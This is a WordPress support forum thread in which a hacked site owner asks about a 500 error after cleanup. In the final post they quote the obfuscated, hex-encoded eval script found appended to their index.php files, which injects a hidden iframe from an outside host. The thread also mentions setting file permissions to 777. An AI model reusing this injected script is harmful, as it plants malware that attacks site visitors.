Hello everybody,
I need some help. I have been hacked and tried to fix the hack. There was a strange script with numbers and the word "eval" in the bottom of the index.php and other indexes (silence is golden) I loaded them down, fixed it and loaded it up. My .htacess was modified too and I loaded some old one up.
Then I changed permissons of .htaccess, wp-config.php. Then passwords.
So I tried to access my site to look if the virus warning has gone, but then appeared "You have no permission to access this server". Then I put the permissions back to the old way, but now there shows the message "error 500".
Anybody does know what still can be wrong? What mistake causes the 500 error message?
I will be very glad to recive some help
Error 500 (9 posts)
-
mochonty
Posted 9 months ago # -
Posted 9 months ago #Thank you Esmi,
the problem is, that after cleaning my files I wanted a better security and made some changes, and now the site is not longer accessible for public. Something went wrong, maybe the overwritten .htaccess file? I put the permissions back to 777, but it did not help.
The main problem now is not the hack, but getting back to be visible. I´m still lerning. Once I fixed the problem with 500 error, I will see if the virus is still there or if i forgot some files.
It´s all very complicated if one is not a professional webmaster, but a self-lerning one. I need to know what files/permissions/things can cause a 500 error. -
Posted 9 months ago #Maybe the .htaccess file? I have another blog with same version and same theme, there is .htaccess file has this code:
#RewriteEngine on
RewriteRule !\.(js|ico|gif|jpg|png|css|php)$ index.php
php_flag magic_quotes_gpc off
php_flag register_globals off
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPressMy actual in the other blog is now
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPressWich one is the correct one? Is there a mistake in one of them? I know that none is secure, but I still a little afraid to manipulate them with for example an unique IP adress to access.
-
I wanted a better security and made some changes
What changes?
I need to know what files/permissions/things can cause a 500 error.
A 500 error has nothing to do with permissions. It's usually due to a script error.
-
Data queen
Posted 9 months ago #Hi Everyone,
I need help. I installed wordpress and starting using bluehost to host my site over a year ago. Everything was fine till I went from 500 users a day to 5,000 last Saturday. First Bluehost said it was the throutling and now they say it's a scripting error or the theme. Someone said I had zombi processes and they fixed them. I don't have a clue what to look for and now it's down more then it's up. I did install w3 cache and couldn't get it to work right. Since, I have turned all my plug-ins. I really need the site to work now. I get 500 errors and them it connects after a few tries. Now it's off more then it's on.
Thanks -
@Data queen: It is considered impolite to interrupt another poster's thread. Please post a new topic.
-
bh_WP_fan
Posted 9 months ago #This is the standard WordPress permalink code so I'd be more inclined to believe that this is the correct/working code and the other contains the error.
# BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress -
Posted 9 months ago #Hi everybody,
thanks for the replies. Well, I wonder what Esmi wrote, that a 500 Error has to do with a Script Error.
I deleted the last line from several index-php because I thought, that this line maybe a Virus (because of the word "eval"). May be I was wrong? Here is this line:
<script>var t="";var arr="646f63756d656e742e777269746528273c696672616d65207372633d22687474703a2f2f616d65726963616e6d6f62696c652e63612f666f72756d2e7068703f74703d36373565616665633433316231663732222077696474683d223122206865696768743d223122206672616d65626f726465723d2230223e3c2f696672616d653e2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);</script>Is this a necesary line and nothing workd because I deleted it?
Reply
You must log in to post.
